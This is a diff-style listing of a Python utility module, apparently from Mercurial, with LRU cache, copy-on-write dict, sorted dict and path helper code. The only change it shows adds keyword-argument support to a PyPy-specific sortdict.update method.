1240 if func.__code__.co_argcount == 1:
1241 # we gain a small amount of time because
1241 # we gain a small amount of time because
1242 # we don't need to pack/unpack the list
1242 # we don't need to pack/unpack the list
1243 def f(arg):
1243 def f(arg):
1244 if arg not in cache:
1244 if arg not in cache:
1245 cache[arg] = func(arg)
1245 cache[arg] = func(arg)
1246 return cache[arg]
1246 return cache[arg]
1247
1247
1248 else:
1248 else:
1249
1249
1250 def f(*args):
1250 def f(*args):
1251 if args not in cache:
1251 if args not in cache:
1252 cache[args] = func(*args)
1252 cache[args] = func(*args)
1253 return cache[args]
1253 return cache[args]
1254
1254
1255 return f
1255 return f
1256
1256
1257
1257
1258 class cow(object):
1258 class cow(object):
1259 """helper class to make copy-on-write easier
1259 """helper class to make copy-on-write easier
1260
1260
1261 Call preparewrite before doing any writes.
1261 Call preparewrite before doing any writes.
1262 """
1262 """
1263
1263
1264 def preparewrite(self):
1264 def preparewrite(self):
1265 """call this before writes, return self or a copied new object"""
1265 """call this before writes, return self or a copied new object"""
1266 if getattr(self, '_copied', 0):
1266 if getattr(self, '_copied', 0):
1267 self._copied -= 1
1267 self._copied -= 1
1268 return self.__class__(self)
1268 return self.__class__(self)
1269 return self
1269 return self
1270
1270
1271 def copy(self):
1271 def copy(self):
1272 """always do a cheap copy"""
1272 """always do a cheap copy"""
1273 self._copied = getattr(self, '_copied', 0) + 1
1273 self._copied = getattr(self, '_copied', 0) + 1
1274 return self
1274 return self
1275
1275
1276
1276
1277 class sortdict(collections.OrderedDict):
1277 class sortdict(collections.OrderedDict):
1278 """a simple sorted dictionary
1278 """a simple sorted dictionary
1279
1279
1280 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
1280 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
1281 >>> d2 = d1.copy()
1281 >>> d2 = d1.copy()
1282 >>> d2
1282 >>> d2
1283 sortdict([('a', 0), ('b', 1)])
1283 sortdict([('a', 0), ('b', 1)])
1284 >>> d2.update([(b'a', 2)])
1284 >>> d2.update([(b'a', 2)])
1285 >>> list(d2.keys()) # should still be in last-set order
1285 >>> list(d2.keys()) # should still be in last-set order
1286 ['b', 'a']
1286 ['b', 'a']
1287 >>> d1.insert(1, b'a.5', 0.5)
1287 >>> d1.insert(1, b'a.5', 0.5)
1288 >>> d1
1288 >>> d1
1289 sortdict([('a', 0), ('a.5', 0.5), ('b', 1)])
1289 sortdict([('a', 0), ('a.5', 0.5), ('b', 1)])
1290 """
1290 """
1291
1291
1292 def __setitem__(self, key, value):
1292 def __setitem__(self, key, value):
1293 if key in self:
1293 if key in self:
1294 del self[key]
1294 del self[key]
1295 super(sortdict, self).__setitem__(key, value)
1295 super(sortdict, self).__setitem__(key, value)
1296
1296
1297 if pycompat.ispypy:
1297 if pycompat.ispypy:
1298 # __setitem__() isn't called as of PyPy 5.8.0
1298 # __setitem__() isn't called as of PyPy 5.8.0
1299 def update(self, src):
1299 def update(self, src, **f):
1300 if isinstance(src, dict):
1300 if isinstance(src, dict):
1301 src = pycompat.iteritems(src)
1301 src = pycompat.iteritems(src)
1302 for k, v in src:
1302 for k, v in src:
1303 self[k] = v
1303 self[k] = v
1304 for k in f:
1305 self[k] = f[k]
1304
1306
1305 def insert(self, position, key, value):
1307 def insert(self, position, key, value):
1306 for (i, (k, v)) in enumerate(list(self.items())):
1308 for (i, (k, v)) in enumerate(list(self.items())):
1307 if i == position:
1309 if i == position:
1308 self[key] = value
1310 self[key] = value
1309 if i >= position:
1311 if i >= position:
1310 del self[k]
1312 del self[k]
1311 self[k] = v
1313 self[k] = v
1312
1314
1313
1315
1314 class cowdict(cow, dict):
1316 class cowdict(cow, dict):
1315 """copy-on-write dict
1317 """copy-on-write dict
1316
1318
1317 Be sure to call d = d.preparewrite() before writing to d.
1319 Be sure to call d = d.preparewrite() before writing to d.
1318
1320
1319 >>> a = cowdict()
1321 >>> a = cowdict()
1320 >>> a is a.preparewrite()
1322 >>> a is a.preparewrite()
1321 True
1323 True
1322 >>> b = a.copy()
1324 >>> b = a.copy()
1323 >>> b is a
1325 >>> b is a
1324 True
1326 True
1325 >>> c = b.copy()
1327 >>> c = b.copy()
1326 >>> c is a
1328 >>> c is a
1327 True
1329 True
1328 >>> a = a.preparewrite()
1330 >>> a = a.preparewrite()
1329 >>> b is a
1331 >>> b is a
1330 False
1332 False
1331 >>> a is a.preparewrite()
1333 >>> a is a.preparewrite()
1332 True
1334 True
1333 >>> c = c.preparewrite()
1335 >>> c = c.preparewrite()
1334 >>> b is c
1336 >>> b is c
1335 False
1337 False
1336 >>> b is b.preparewrite()
1338 >>> b is b.preparewrite()
1337 True
1339 True
1338 """
1340 """
1339
1341
1340
1342
1341 class cowsortdict(cow, sortdict):
1343 class cowsortdict(cow, sortdict):
1342 """copy-on-write sortdict
1344 """copy-on-write sortdict
1343
1345
1344 Be sure to call d = d.preparewrite() before writing to d.
1346 Be sure to call d = d.preparewrite() before writing to d.
1345 """
1347 """
1346
1348
1347
1349
1348 class transactional(object): # pytype: disable=ignored-metaclass
1350 class transactional(object): # pytype: disable=ignored-metaclass
1349 """Base class for making a transactional type into a context manager."""
1351 """Base class for making a transactional type into a context manager."""
1350
1352
1351 __metaclass__ = abc.ABCMeta
1353 __metaclass__ = abc.ABCMeta
1352
1354
1353 @abc.abstractmethod
1355 @abc.abstractmethod
1354 def close(self):
1356 def close(self):
1355 """Successfully closes the transaction."""
1357 """Successfully closes the transaction."""
1356
1358
1357 @abc.abstractmethod
1359 @abc.abstractmethod
1358 def release(self):
1360 def release(self):
1359 """Marks the end of the transaction.
1361 """Marks the end of the transaction.
1360
1362
1361 If the transaction has not been closed, it will be aborted.
1363 If the transaction has not been closed, it will be aborted.
1362 """
1364 """
1363
1365
1364 def __enter__(self):
1366 def __enter__(self):
1365 return self
1367 return self
1366
1368
1367 def __exit__(self, exc_type, exc_val, exc_tb):
1369 def __exit__(self, exc_type, exc_val, exc_tb):
1368 try:
1370 try:
1369 if exc_type is None:
1371 if exc_type is None:
1370 self.close()
1372 self.close()
1371 finally:
1373 finally:
1372 self.release()
1374 self.release()
1373
1375
1374
1376
1375 @contextlib.contextmanager
1377 @contextlib.contextmanager
1376 def acceptintervention(tr=None):
1378 def acceptintervention(tr=None):
1377 """A context manager that closes the transaction on InterventionRequired
1379 """A context manager that closes the transaction on InterventionRequired
1378
1380
1379 If no transaction was provided, this simply runs the body and returns
1381 If no transaction was provided, this simply runs the body and returns
1380 """
1382 """
1381 if not tr:
1383 if not tr:
1382 yield
1384 yield
1383 return
1385 return
1384 try:
1386 try:
1385 yield
1387 yield
1386 tr.close()
1388 tr.close()
1387 except error.InterventionRequired:
1389 except error.InterventionRequired:
1388 tr.close()
1390 tr.close()
1389 raise
1391 raise
1390 finally:
1392 finally:
1391 tr.release()
1393 tr.release()
1392
1394
1393
1395
1394 @contextlib.contextmanager
1396 @contextlib.contextmanager
1395 def nullcontextmanager(enter_result=None):
1397 def nullcontextmanager(enter_result=None):
1396 yield enter_result
1398 yield enter_result
1397
1399
1398
1400
1399 class _lrucachenode(object):
1401 class _lrucachenode(object):
1400 """A node in a doubly linked list.
1402 """A node in a doubly linked list.
1401
1403
1402 Holds a reference to nodes on either side as well as a key-value
1404 Holds a reference to nodes on either side as well as a key-value
1403 pair for the dictionary entry.
1405 pair for the dictionary entry.
1404 """
1406 """
1405
1407
1406 __slots__ = ('next', 'prev', 'key', 'value', 'cost')
1408 __slots__ = ('next', 'prev', 'key', 'value', 'cost')
1407
1409
1408 def __init__(self):
1410 def __init__(self):
1409 self.next = None
1411 self.next = None
1410 self.prev = None
1412 self.prev = None
1411
1413
1412 self.key = _notset
1414 self.key = _notset
1413 self.value = None
1415 self.value = None
1414 self.cost = 0
1416 self.cost = 0
1415
1417
1416 def markempty(self):
1418 def markempty(self):
1417 """Mark the node as emptied."""
1419 """Mark the node as emptied."""
1418 self.key = _notset
1420 self.key = _notset
1419 self.value = None
1421 self.value = None
1420 self.cost = 0
1422 self.cost = 0
1421
1423
1422
1424
1423 class lrucachedict(object):
1425 class lrucachedict(object):
1424 """Dict that caches most recent accesses and sets.
1426 """Dict that caches most recent accesses and sets.
1425
1427
1426 The dict consists of an actual backing dict - indexed by original
1428 The dict consists of an actual backing dict - indexed by original
1427 key - and a doubly linked circular list defining the order of entries in
1429 key - and a doubly linked circular list defining the order of entries in
1428 the cache.
1430 the cache.
1429
1431
1430 The head node is the newest entry in the cache. If the cache is full,
1432 The head node is the newest entry in the cache. If the cache is full,
1431 we recycle head.prev and make it the new head. Cache accesses result in
1433 we recycle head.prev and make it the new head. Cache accesses result in
1432 the node being moved to before the existing head and being marked as the
1434 the node being moved to before the existing head and being marked as the
1433 new head node.
1435 new head node.
1434
1436
1435 Items in the cache can be inserted with an optional "cost" value. This is
1437 Items in the cache can be inserted with an optional "cost" value. This is
1436 simply an integer that is specified by the caller. The cache can be queried
1438 simply an integer that is specified by the caller. The cache can be queried
1437 for the total cost of all items presently in the cache.
1439 for the total cost of all items presently in the cache.
1438
1440
1439 The cache can also define a maximum cost. If a cache insertion would
1441 The cache can also define a maximum cost. If a cache insertion would
1440 cause the total cost of the cache to go beyond the maximum cost limit,
1442 cause the total cost of the cache to go beyond the maximum cost limit,
1441 nodes will be evicted to make room for the new code. This can be used
1443 nodes will be evicted to make room for the new code. This can be used
1442 to e.g. set a max memory limit and associate an estimated bytes size
1444 to e.g. set a max memory limit and associate an estimated bytes size
1443 cost to each item in the cache. By default, no maximum cost is enforced.
1445 cost to each item in the cache. By default, no maximum cost is enforced.
1444 """
1446 """
1445
1447
1446 def __init__(self, max, maxcost=0):
1448 def __init__(self, max, maxcost=0):
1447 self._cache = {}
1449 self._cache = {}
1448
1450
1449 self._head = head = _lrucachenode()
1451 self._head = head = _lrucachenode()
1450 head.prev = head
1452 head.prev = head
1451 head.next = head
1453 head.next = head
1452 self._size = 1
1454 self._size = 1
1453 self.capacity = max
1455 self.capacity = max
1454 self.totalcost = 0
1456 self.totalcost = 0
1455 self.maxcost = maxcost
1457 self.maxcost = maxcost
1456
1458
1457 def __len__(self):
1459 def __len__(self):
1458 return len(self._cache)
1460 return len(self._cache)
1459
1461
1460 def __contains__(self, k):
1462 def __contains__(self, k):
1461 return k in self._cache
1463 return k in self._cache
1462
1464
1463 def __iter__(self):
1465 def __iter__(self):
1464 # We don't have to iterate in cache order, but why not.
1466 # We don't have to iterate in cache order, but why not.
1465 n = self._head
1467 n = self._head
1466 for i in range(len(self._cache)):
1468 for i in range(len(self._cache)):
1467 yield n.key
1469 yield n.key
1468 n = n.next
1470 n = n.next
1469
1471
1470 def __getitem__(self, k):
1472 def __getitem__(self, k):
1471 node = self._cache[k]
1473 node = self._cache[k]
1472 self._movetohead(node)
1474 self._movetohead(node)
1473 return node.value
1475 return node.value
1474
1476
1475 def insert(self, k, v, cost=0):
1477 def insert(self, k, v, cost=0):
1476 """Insert a new item in the cache with optional cost value."""
1478 """Insert a new item in the cache with optional cost value."""
1477 node = self._cache.get(k)
1479 node = self._cache.get(k)
1478 # Replace existing value and mark as newest.
1480 # Replace existing value and mark as newest.
1479 if node is not None:
1481 if node is not None:
1480 self.totalcost -= node.cost
1482 self.totalcost -= node.cost
1481 node.value = v
1483 node.value = v
1482 node.cost = cost
1484 node.cost = cost
1483 self.totalcost += cost
1485 self.totalcost += cost
1484 self._movetohead(node)
1486 self._movetohead(node)
1485
1487
1486 if self.maxcost:
1488 if self.maxcost:
1487 self._enforcecostlimit()
1489 self._enforcecostlimit()
1488
1490
1489 return
1491 return
1490
1492
1491 if self._size < self.capacity:
1493 if self._size < self.capacity:
1492 node = self._addcapacity()
1494 node = self._addcapacity()
1493 else:
1495 else:
1494 # Grab the last/oldest item.
1496 # Grab the last/oldest item.
1495 node = self._head.prev
1497 node = self._head.prev
1496
1498
1497 # At capacity. Kill the old entry.
1499 # At capacity. Kill the old entry.
1498 if node.key is not _notset:
1500 if node.key is not _notset:
1499 self.totalcost -= node.cost
1501 self.totalcost -= node.cost
1500 del self._cache[node.key]
1502 del self._cache[node.key]
1501
1503
1502 node.key = k
1504 node.key = k
1503 node.value = v
1505 node.value = v
1504 node.cost = cost
1506 node.cost = cost
1505 self.totalcost += cost
1507 self.totalcost += cost
1506 self._cache[k] = node
1508 self._cache[k] = node
1507 # And mark it as newest entry. No need to adjust order since it
1509 # And mark it as newest entry. No need to adjust order since it
1508 # is already self._head.prev.
1510 # is already self._head.prev.
1509 self._head = node
1511 self._head = node
1510
1512
1511 if self.maxcost:
1513 if self.maxcost:
1512 self._enforcecostlimit()
1514 self._enforcecostlimit()
1513
1515
1514 def __setitem__(self, k, v):
1516 def __setitem__(self, k, v):
1515 self.insert(k, v)
1517 self.insert(k, v)
1516
1518
1517 def __delitem__(self, k):
1519 def __delitem__(self, k):
1518 self.pop(k)
1520 self.pop(k)
1519
1521
1520 def pop(self, k, default=_notset):
1522 def pop(self, k, default=_notset):
1521 try:
1523 try:
1522 node = self._cache.pop(k)
1524 node = self._cache.pop(k)
1523 except KeyError:
1525 except KeyError:
1524 if default is _notset:
1526 if default is _notset:
1525 raise
1527 raise
1526 return default
1528 return default
1527
1529
1528 assert node is not None # help pytype
1530 assert node is not None # help pytype
1529 value = node.value
1531 value = node.value
1530 self.totalcost -= node.cost
1532 self.totalcost -= node.cost
1531 node.markempty()
1533 node.markempty()
1532
1534
1533 # Temporarily mark as newest item before re-adjusting head to make
1535 # Temporarily mark as newest item before re-adjusting head to make
1534 # this node the oldest item.
1536 # this node the oldest item.
1535 self._movetohead(node)
1537 self._movetohead(node)
1536 self._head = node.next
1538 self._head = node.next
1537
1539
1538 return value
1540 return value
1539
1541
1540 # Additional dict methods.
1542 # Additional dict methods.
1541
1543
1542 def get(self, k, default=None):
1544 def get(self, k, default=None):
1543 try:
1545 try:
1544 return self.__getitem__(k)
1546 return self.__getitem__(k)
1545 except KeyError:
1547 except KeyError:
1546 return default
1548 return default
1547
1549
1548 def peek(self, k, default=_notset):
1550 def peek(self, k, default=_notset):
1549 """Get the specified item without moving it to the head
1551 """Get the specified item without moving it to the head
1550
1552
1551 Unlike get(), this doesn't mutate the internal state. But be aware
1553 Unlike get(), this doesn't mutate the internal state. But be aware
1552 that it doesn't mean peek() is thread safe.
1554 that it doesn't mean peek() is thread safe.
1553 """
1555 """
1554 try:
1556 try:
1555 node = self._cache[k]
1557 node = self._cache[k]
1556 return node.value
1558 return node.value
1557 except KeyError:
1559 except KeyError:
1558 if default is _notset:
1560 if default is _notset:
1559 raise
1561 raise
1560 return default
1562 return default
1561
1563
1562 def clear(self):
1564 def clear(self):
1563 n = self._head
1565 n = self._head
1564 while n.key is not _notset:
1566 while n.key is not _notset:
1565 self.totalcost -= n.cost
1567 self.totalcost -= n.cost
1566 n.markempty()
1568 n.markempty()
1567 n = n.next
1569 n = n.next
1568
1570
1569 self._cache.clear()
1571 self._cache.clear()
1570
1572
1571 def copy(self, capacity=None, maxcost=0):
1573 def copy(self, capacity=None, maxcost=0):
1572 """Create a new cache as a copy of the current one.
1574 """Create a new cache as a copy of the current one.
1573
1575
1574 By default, the new cache has the same capacity as the existing one.
1576 By default, the new cache has the same capacity as the existing one.
1575 But, the cache capacity can be changed as part of performing the
1577 But, the cache capacity can be changed as part of performing the
1576 copy.
1578 copy.
1577
1579
1578 Items in the copy have an insertion/access order matching this
1580 Items in the copy have an insertion/access order matching this
1579 instance.
1581 instance.
1580 """
1582 """
1581
1583
1582 capacity = capacity or self.capacity
1584 capacity = capacity or self.capacity
1583 maxcost = maxcost or self.maxcost
1585 maxcost = maxcost or self.maxcost
1584 result = lrucachedict(capacity, maxcost=maxcost)
1586 result = lrucachedict(capacity, maxcost=maxcost)
1585
1587
1586 # We copy entries by iterating in oldest-to-newest order so the copy
1588 # We copy entries by iterating in oldest-to-newest order so the copy
1587 # has the correct ordering.
1589 # has the correct ordering.
1588
1590
1589 # Find the first non-empty entry.
1591 # Find the first non-empty entry.
1590 n = self._head.prev
1592 n = self._head.prev
1591 while n.key is _notset and n is not self._head:
1593 while n.key is _notset and n is not self._head:
1592 n = n.prev
1594 n = n.prev
1593
1595
1594 # We could potentially skip the first N items when decreasing capacity.
1596 # We could potentially skip the first N items when decreasing capacity.
1595 # But let's keep it simple unless it is a performance problem.
1597 # But let's keep it simple unless it is a performance problem.
1596 for i in range(len(self._cache)):
1598 for i in range(len(self._cache)):
1597 result.insert(n.key, n.value, cost=n.cost)
1599 result.insert(n.key, n.value, cost=n.cost)
1598 n = n.prev
1600 n = n.prev
1599
1601
1600 return result
1602 return result
1601
1603
1602 def popoldest(self):
1604 def popoldest(self):
1603 """Remove the oldest item from the cache.
1605 """Remove the oldest item from the cache.
1604
1606
1605 Returns the (key, value) describing the removed cache entry.
1607 Returns the (key, value) describing the removed cache entry.
1606 """
1608 """
1607 if not self._cache:
1609 if not self._cache:
1608 return
1610 return
1609
1611
1610 # Walk the linked list backwards starting at tail node until we hit
1612 # Walk the linked list backwards starting at tail node until we hit
1611 # a non-empty node.
1613 # a non-empty node.
1612 n = self._head.prev
1614 n = self._head.prev
1613 while n.key is _notset:
1615 while n.key is _notset:
1614 n = n.prev
1616 n = n.prev
1615
1617
1616 assert n is not None # help pytype
1618 assert n is not None # help pytype
1617
1619
1618 key, value = n.key, n.value
1620 key, value = n.key, n.value
1619
1621
1620 # And remove it from the cache and mark it as empty.
1622 # And remove it from the cache and mark it as empty.
1621 del self._cache[n.key]
1623 del self._cache[n.key]
1622 self.totalcost -= n.cost
1624 self.totalcost -= n.cost
1623 n.markempty()
1625 n.markempty()
1624
1626
1625 return key, value
1627 return key, value
1626
1628
1627 def _movetohead(self, node):
1629 def _movetohead(self, node):
1628 """Mark a node as the newest, making it the new head.
1630 """Mark a node as the newest, making it the new head.
1629
1631
1630 When a node is accessed, it becomes the freshest entry in the LRU
1632 When a node is accessed, it becomes the freshest entry in the LRU
1631 list, which is denoted by self._head.
1633 list, which is denoted by self._head.
1632
1634
1633 Visually, let's make ``N`` the new head node (* denotes head):
1635 Visually, let's make ``N`` the new head node (* denotes head):
1634
1636
1635 previous/oldest <-> head <-> next/next newest
1637 previous/oldest <-> head <-> next/next newest
1636
1638
1637 ----<->--- A* ---<->-----
1639 ----<->--- A* ---<->-----
1638 | |
1640 | |
1639 E <-> D <-> N <-> C <-> B
1641 E <-> D <-> N <-> C <-> B
1640
1642
1641 To:
1643 To:
1642
1644
1643 ----<->--- N* ---<->-----
1645 ----<->--- N* ---<->-----
1644 | |
1646 | |
1645 E <-> D <-> C <-> B <-> A
1647 E <-> D <-> C <-> B <-> A
1646
1648
1647 This requires the following moves:
1649 This requires the following moves:
1648
1650
1649 C.next = D (node.prev.next = node.next)
1651 C.next = D (node.prev.next = node.next)
1650 D.prev = C (node.next.prev = node.prev)
1652 D.prev = C (node.next.prev = node.prev)
1651 E.next = N (head.prev.next = node)
1653 E.next = N (head.prev.next = node)
1652 N.prev = E (node.prev = head.prev)
1654 N.prev = E (node.prev = head.prev)
1653 N.next = A (node.next = head)
1655 N.next = A (node.next = head)
1654 A.prev = N (head.prev = node)
1656 A.prev = N (head.prev = node)
1655 """
1657 """
1656 head = self._head
1658 head = self._head
1657 # C.next = D
1659 # C.next = D
1658 node.prev.next = node.next
1660 node.prev.next = node.next
1659 # D.prev = C
1661 # D.prev = C
1660 node.next.prev = node.prev
1662 node.next.prev = node.prev
1661 # N.prev = E
1663 # N.prev = E
1662 node.prev = head.prev
1664 node.prev = head.prev
1663 # N.next = A
1665 # N.next = A
1664 # It is tempting to do just "head" here, however if node is
1666 # It is tempting to do just "head" here, however if node is
1665 # adjacent to head, this will do bad things.
1667 # adjacent to head, this will do bad things.
1666 node.next = head.prev.next
1668 node.next = head.prev.next
1667 # E.next = N
1669 # E.next = N
1668 node.next.prev = node
1670 node.next.prev = node
1669 # A.prev = N
1671 # A.prev = N
1670 node.prev.next = node
1672 node.prev.next = node
1671
1673
1672 self._head = node
1674 self._head = node
1673
1675
1674 def _addcapacity(self):
1676 def _addcapacity(self):
1675 """Add a node to the circular linked list.
1677 """Add a node to the circular linked list.
1676
1678
1677 The new node is inserted before the head node.
1679 The new node is inserted before the head node.
1678 """
1680 """
1679 head = self._head
1681 head = self._head
1680 node = _lrucachenode()
1682 node = _lrucachenode()
1681 head.prev.next = node
1683 head.prev.next = node
1682 node.prev = head.prev
1684 node.prev = head.prev
1683 node.next = head
1685 node.next = head
1684 head.prev = node
1686 head.prev = node
1685 self._size += 1
1687 self._size += 1
1686 return node
1688 return node
1687
1689
1688 def _enforcecostlimit(self):
1690 def _enforcecostlimit(self):
1689 # This should run after an insertion. It should only be called if total
1691 # This should run after an insertion. It should only be called if total
1690 # cost limits are being enforced.
1692 # cost limits are being enforced.
1691 # The most recently inserted node is never evicted.
1693 # The most recently inserted node is never evicted.
1692 if len(self) <= 1 or self.totalcost <= self.maxcost:
1694 if len(self) <= 1 or self.totalcost <= self.maxcost:
1693 return
1695 return
1694
1696
1695 # This is logically equivalent to calling popoldest() until we
1697 # This is logically equivalent to calling popoldest() until we
1696 # free up enough cost. We don't do that since popoldest() needs
1698 # free up enough cost. We don't do that since popoldest() needs
1697 # to walk the linked list and doing this in a loop would be
1699 # to walk the linked list and doing this in a loop would be
1698 # quadratic. So we find the first non-empty node and then
1700 # quadratic. So we find the first non-empty node and then
1699 # walk nodes until we free up enough capacity.
1701 # walk nodes until we free up enough capacity.
1700 #
1702 #
1701 # If we only removed the minimum number of nodes to free enough
1703 # If we only removed the minimum number of nodes to free enough
1702 # cost at insert time, chances are high that the next insert would
1704 # cost at insert time, chances are high that the next insert would
1703 # also require pruning. This would effectively constitute quadratic
1705 # also require pruning. This would effectively constitute quadratic
1704 # behavior for insert-heavy workloads. To mitigate this, we set a
1706 # behavior for insert-heavy workloads. To mitigate this, we set a
1705 # target cost that is a percentage of the max cost. This will tend
1707 # target cost that is a percentage of the max cost. This will tend
1706 # to free more nodes when the high water mark is reached, which
1708 # to free more nodes when the high water mark is reached, which
1707 # lowers the chances of needing to prune on the subsequent insert.
1709 # lowers the chances of needing to prune on the subsequent insert.
1708 targetcost = int(self.maxcost * 0.75)
1710 targetcost = int(self.maxcost * 0.75)
1709
1711
1710 n = self._head.prev
1712 n = self._head.prev
1711 while n.key is _notset:
1713 while n.key is _notset:
1712 n = n.prev
1714 n = n.prev
1713
1715
1714 while len(self) > 1 and self.totalcost > targetcost:
1716 while len(self) > 1 and self.totalcost > targetcost:
1715 del self._cache[n.key]
1717 del self._cache[n.key]
1716 self.totalcost -= n.cost
1718 self.totalcost -= n.cost
1717 n.markempty()
1719 n.markempty()
1718 n = n.prev
1720 n = n.prev
1719
1721
1720
1722
1721 def lrucachefunc(func):
1723 def lrucachefunc(func):
1722 '''cache most recent results of function calls'''
1724 '''cache most recent results of function calls'''
1723 cache = {}
1725 cache = {}
1724 order = collections.deque()
1726 order = collections.deque()
1725 if func.__code__.co_argcount == 1:
1727 if func.__code__.co_argcount == 1:
1726
1728
1727 def f(arg):
1729 def f(arg):
1728 if arg not in cache:
1730 if arg not in cache:
1729 if len(cache) > 20:
1731 if len(cache) > 20:
1730 del cache[order.popleft()]
1732 del cache[order.popleft()]
1731 cache[arg] = func(arg)
1733 cache[arg] = func(arg)
1732 else:
1734 else:
1733 order.remove(arg)
1735 order.remove(arg)
1734 order.append(arg)
1736 order.append(arg)
1735 return cache[arg]
1737 return cache[arg]
1736
1738
1737 else:
1739 else:
1738
1740
1739 def f(*args):
1741 def f(*args):
1740 if args not in cache:
1742 if args not in cache:
1741 if len(cache) > 20:
1743 if len(cache) > 20:
1742 del cache[order.popleft()]
1744 del cache[order.popleft()]
1743 cache[args] = func(*args)
1745 cache[args] = func(*args)
1744 else:
1746 else:
1745 order.remove(args)
1747 order.remove(args)
1746 order.append(args)
1748 order.append(args)
1747 return cache[args]
1749 return cache[args]
1748
1750
1749 return f
1751 return f
1750
1752
1751
1753
1752 class propertycache(object):
1754 class propertycache(object):
1753 def __init__(self, func):
1755 def __init__(self, func):
1754 self.func = func
1756 self.func = func
1755 self.name = func.__name__
1757 self.name = func.__name__
1756
1758
1757 def __get__(self, obj, type=None):
1759 def __get__(self, obj, type=None):
1758 result = self.func(obj)
1760 result = self.func(obj)
1759 self.cachevalue(obj, result)
1761 self.cachevalue(obj, result)
1760 return result
1762 return result
1761
1763
1762 def cachevalue(self, obj, value):
1764 def cachevalue(self, obj, value):
1763 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1765 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1764 obj.__dict__[self.name] = value
1766 obj.__dict__[self.name] = value
1765
1767
1766
1768
1767 def clearcachedproperty(obj, prop):
1769 def clearcachedproperty(obj, prop):
1768 '''clear a cached property value, if one has been set'''
1770 '''clear a cached property value, if one has been set'''
1769 prop = pycompat.sysstr(prop)
1771 prop = pycompat.sysstr(prop)
1770 if prop in obj.__dict__:
1772 if prop in obj.__dict__:
1771 del obj.__dict__[prop]
1773 del obj.__dict__[prop]
1772
1774
1773
1775
1774 def increasingchunks(source, min=1024, max=65536):
1776 def increasingchunks(source, min=1024, max=65536):
1775 """return no less than min bytes per chunk while data remains,
1777 """return no less than min bytes per chunk while data remains,
1776 doubling min after each chunk until it reaches max"""
1778 doubling min after each chunk until it reaches max"""
1777
1779
1778 def log2(x):
1780 def log2(x):
1779 if not x:
1781 if not x:
1780 return 0
1782 return 0
1781 i = 0
1783 i = 0
1782 while x:
1784 while x:
1783 x >>= 1
1785 x >>= 1
1784 i += 1
1786 i += 1
1785 return i - 1
1787 return i - 1
1786
1788
1787 buf = []
1789 buf = []
1788 blen = 0
1790 blen = 0
1789 for chunk in source:
1791 for chunk in source:
1790 buf.append(chunk)
1792 buf.append(chunk)
1791 blen += len(chunk)
1793 blen += len(chunk)
1792 if blen >= min:
1794 if blen >= min:
1793 if min < max:
1795 if min < max:
1794 min = min << 1
1796 min = min << 1
1795 nmin = 1 << log2(blen)
1797 nmin = 1 << log2(blen)
1796 if nmin > min:
1798 if nmin > min:
1797 min = nmin
1799 min = nmin
1798 if min > max:
1800 if min > max:
1799 min = max
1801 min = max
1800 yield b''.join(buf)
1802 yield b''.join(buf)
1801 blen = 0
1803 blen = 0
1802 buf = []
1804 buf = []
1803 if buf:
1805 if buf:
1804 yield b''.join(buf)
1806 yield b''.join(buf)
1805
1807
1806
1808
1807 def always(fn):
1809 def always(fn):
1808 return True
1810 return True
1809
1811
1810
1812
1811 def never(fn):
1813 def never(fn):
1812 return False
1814 return False
1813
1815
1814
1816
1815 def nogc(func):
1817 def nogc(func):
1816 """disable garbage collector
1818 """disable garbage collector
1817
1819
1818 Python's garbage collector triggers a GC each time a certain number of
1820 Python's garbage collector triggers a GC each time a certain number of
1819 container objects (the number being defined by gc.get_threshold()) are
1821 container objects (the number being defined by gc.get_threshold()) are
1820 allocated even when marked not to be tracked by the collector. Tracking has
1822 allocated even when marked not to be tracked by the collector. Tracking has
1821 no effect on when GCs are triggered, only on what objects the GC looks
1823 no effect on when GCs are triggered, only on what objects the GC looks
1822 into. As a workaround, disable GC while building complex (huge)
1824 into. As a workaround, disable GC while building complex (huge)
1823 containers.
1825 containers.
1824
1826
1825 This garbage collector issue have been fixed in 2.7. But it still affect
1827 This garbage collector issue have been fixed in 2.7. But it still affect
1826 CPython's performance.
1828 CPython's performance.
1827 """
1829 """
1828
1830
1829 def wrapper(*args, **kwargs):
1831 def wrapper(*args, **kwargs):
1830 gcenabled = gc.isenabled()
1832 gcenabled = gc.isenabled()
1831 gc.disable()
1833 gc.disable()
1832 try:
1834 try:
1833 return func(*args, **kwargs)
1835 return func(*args, **kwargs)
1834 finally:
1836 finally:
1835 if gcenabled:
1837 if gcenabled:
1836 gc.enable()
1838 gc.enable()
1837
1839
1838 return wrapper
1840 return wrapper
1839
1841
1840
1842
1841 if pycompat.ispypy:
1843 if pycompat.ispypy:
1842 # PyPy runs slower with gc disabled
1844 # PyPy runs slower with gc disabled
1843 nogc = lambda x: x
1845 nogc = lambda x: x
1844
1846
1845
1847
1846 def pathto(root, n1, n2):
1848 def pathto(root, n1, n2):
1847 # type: (bytes, bytes, bytes) -> bytes
1849 # type: (bytes, bytes, bytes) -> bytes
1848 """return the relative path from one place to another.
1850 """return the relative path from one place to another.
1849 root should use os.sep to separate directories
1851 root should use os.sep to separate directories
1850 n1 should use os.sep to separate directories
1852 n1 should use os.sep to separate directories
1851 n2 should use "/" to separate directories
1853 n2 should use "/" to separate directories
1852 returns an os.sep-separated path.
1854 returns an os.sep-separated path.
1853
1855
1854 If n1 is a relative path, it's assumed it's
1856 If n1 is a relative path, it's assumed it's
1855 relative to root.
1857 relative to root.
1856 n2 should always be relative to root.
1858 n2 should always be relative to root.
1857 """
1859 """
1858 if not n1:
1860 if not n1:
1859 return localpath(n2)
1861 return localpath(n2)
1860 if os.path.isabs(n1):
1862 if os.path.isabs(n1):
1861 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1863 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1862 return os.path.join(root, localpath(n2))
1864 return os.path.join(root, localpath(n2))
1863 n2 = b'/'.join((pconvert(root), n2))
1865 n2 = b'/'.join((pconvert(root), n2))
1864 a, b = splitpath(n1), n2.split(b'/')
1866 a, b = splitpath(n1), n2.split(b'/')
1865 a.reverse()
1867 a.reverse()
1866 b.reverse()
1868 b.reverse()
1867 while a and b and a[-1] == b[-1]:
1869 while a and b and a[-1] == b[-1]:
1868 a.pop()
1870 a.pop()
1869 b.pop()
1871 b.pop()
1870 b.reverse()
1872 b.reverse()
1871 return pycompat.ossep.join(([b'..'] * len(a)) + b) or b'.'
